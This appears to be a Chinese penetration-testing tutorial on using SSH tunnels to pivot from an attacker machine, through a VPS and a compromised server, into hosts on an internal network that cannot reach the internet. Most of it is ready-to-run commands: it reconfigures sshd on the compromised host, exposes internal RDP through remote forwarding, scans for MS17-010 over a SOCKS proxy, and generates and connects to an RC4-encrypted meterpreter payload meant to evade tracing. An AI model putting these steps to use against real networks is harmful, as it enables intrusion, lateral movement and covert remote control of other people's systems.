SSH会自动加密和解密所有SSH客户端与服务端之间的网络数据,还能够将其他TCP端口的网络数据通过SSH连接进行转发,并且自动提供了相应的加密及解密服务,这一过程被叫做“SSH隧道” (tunneling)。
SSH隧道加密传输,两大优势:
SSH隧道加密传输, C/S 模式的架构,配置文件分为:
关于建立ssh隧道时所用到一些参数的详细解释:
1 | -C 压缩传输,加快传输速度 2 | -f 在后台对用户名密码进行认证 3 | -N 仅仅只用来转发,不用再弹回一个新的shell -n 后台运行 4 | -q 安静模式,不要显示任何debug信息 5 | -l 指定ssh登录名 6 | -g 允许远程主机连接到本地用于转发的端口 7 | -L 进行本地端口转发 8 | -R 进行远程端口转发 9 | -D 动态转发,即socks代理 10 | -T 禁止分配伪终端 11 | -p 指定远程ssh服务端口
把本地端口数据转发到远程服务器,本地服务器作为SSH客户端及应用户端,称为正向 tcp 端口加密转发。
基础环境
本地攻击机 10.11.42.99
☁️VPS 192.168.144.174
☁️目标Widnwos Web服务器(出网) 192.168.144.210
必要配置
到☁️VPS192.168.144.174机器上修改 ssh 配置:
1 | # vim /etc/ssh/sshd_config 2 | 3 | AllowTcpForwarding yes 4 | GatewayPorts yes 5 | TCPKeepAlive yes 6 | PasswordAuthentication yes 7 | 8 | # service ssh restart
参数详解
具体流程
先在本地攻击机执行ssh转发,之后用远程桌面连接本地的33389端口,实际是连接192.168.144.210的远程桌面。
简单说 就是通过☁️VPS这台机器把本地攻击机的33389端口转到了☁️目标服务器的3389端口上,也就是说这个ssh 隧道是建立在本地攻击机与☁️VPS之间的。
1 | ssh -C -f -N -g -L listen_port:DST_Host:DST_port user@Tunnel_Host 2 | ssh -C -f -N -g -L 33389:192.168.144.210:3389 root@192.168.144.174 -p 22
把远程端口数据转发到本地服务器,本地服务器作为SSH客户端及应用服务端,称为反向tcp端口加密转发。
基础环境
☁️VPS 10.11.42.99
☁️目标Linux Web服务器(出网) 192.168.144.174
目标Widnwos Web服务器(不出网) 192.168.144.210
必要配置
现已获取☁️目标服务器(出网)权限,在该机器上修改 ssh 配置:
1 | # vim /etc/ssh/sshd_config 2 | 3 | AllowTcpForwarding yes 4 | GatewayPorts yes 5 | TCPKeepAlive yes 6 | PasswordAuthentication yes 7 | 8 | # service ssh restart
具体流程
继续在☁️目标服务器(出网)执行ssh转发,通过 ☁️VPS这台机器,把来自外部的33389端口流量都转到目标服务器(不出网)的 3389 上。
1 | ssh -C -f -N -g -R listen_port:DST_Host:DST_port user@Tunnel_Host 2 | ssh -C -f -N -g -R 33389:192.168.144.210:3389 anonysec@10.11.42.99 -p 22
回到 ☁️VPS这台机器,查看33389端口是否处于监听状态。如果处于监听状态,则说明ssh隧道建立成功。
注意:隧道建立成功后,默认并非监听在 0.0.0.0,而是监听在 127.0.0.1,可以用rinetd再做一次本地转发。
先在☁️VPS上装好rinetd,之后在rinetd配置文件中添加一条转发规则。
1 | apt install rinetd -y 2 | vim /etc/rinetd.conf 3 | 4 | 0.0.0.0 3389 127.0.0.1 33389 #转发规则 5 | 6 | service rinetd start
rinetd本地转发后,查看端口是否处于监听状态。
1 | netstat -an |egrep "3389|33389"
远程连接☁️VPS的3389端口,成功连接进入目标服务器(不出网)的远程桌面中。
动态端口转发实际上是建立一个ssh正向加密的socks4/5代理通道,任何支持socks4/5协议的程序都可以使用这个加密的通道来进行代理访问,称为正向加密socks。
基础环境
☁️VPS 10.11.42.99
☁️目标Linux Web服务器(出网) 192.168.144.174
目标Widnwos Web服务器(不出网) 192.168.144.210
目标Widnwos Web2服务器(不出网) 192.168.144.155
必要配置
现已获取☁️目标服务器(出网)权限,在该机器上修改 ssh 配置:
1 | # vim /etc/ssh/sshd_config 2 | 3 | AllowTcpForwarding yes 4 | GatewayPorts yes 5 | TCPKeepAlive yes 6 | PasswordAuthentication yes 7 | 8 | # service ssh restart
具体流程
在☁️VPS执行ssh转发,并查看10080端口是否处于监听状态。
1 | ssh -C -f -N -g -D listen_port user@Tunnel_Host 2 | ssh -C -f -N -g -D 10080 anonysec@10.11.42.99 -p 22 #监听127.0.0.1 3 | ssh -C -f -N -g -D 0.0.0.0:10080 anonysec@10.11.42.99 -p 22 #监听0.0.0.0
回到metasploit机器上,挂 socks 代理,扫描内网服务器MS17_010。
1 | sudo msfconsole -q 2 | msf5 > setg proxies socks5:10.11.42.99:10080 3 | msf5 > use auxiliary/scanner/smb/smb_ms17_010 4 | msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.144.210 5 | msf5 auxiliary(scanner/smb/smb_ms17_010) > set threads 10 6 | msf5 auxiliary(scanner/smb/smb_ms17_010) > run
双重加密
利用”ssh隧道+rc4双重加密”去连接目标内网下指定机器上的meterpreter,让payload变的更加难以追踪。
首先,用msfvenom生成bind的rc4 payload,并将rc4.exe传入到目标Web2服务器(不出网)中,并执行。
1 | msfvenom -p windows/meterpreter/bind_tcp_rc4 rc4password=AnonySec lport=443 -f exe -o rc4.exe
回到metasploit机器上,挂 socks 代理,直接bind连接到目标内网中Web2服务器(不出网)的meterpreter下。
1 | sudo msfconsole -q 2 | msf5 > setg proxies socks5:10.11.42.99:10080 3 | msf5 > use exploit/multi/handler 4 | msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp_rc4 5 | msf5 exploit(multi/handler) > set rc4password AnonySec 6 | msf5 exploit(multi/handler) > set rhost 192.168.144.155 7 | msf5 exploit(multi/handler) > set lport 443 8 | msf5 exploit(multi/handler) > run -j
SSH隧道的实战利用,需要全方位考虑,本文只是讲述了SSH端口转发的思路,实际更需要去探索如何应对某些极端的目标内网环境! 严禁用于非法用途,如产生法律问题,均由作者自行承担。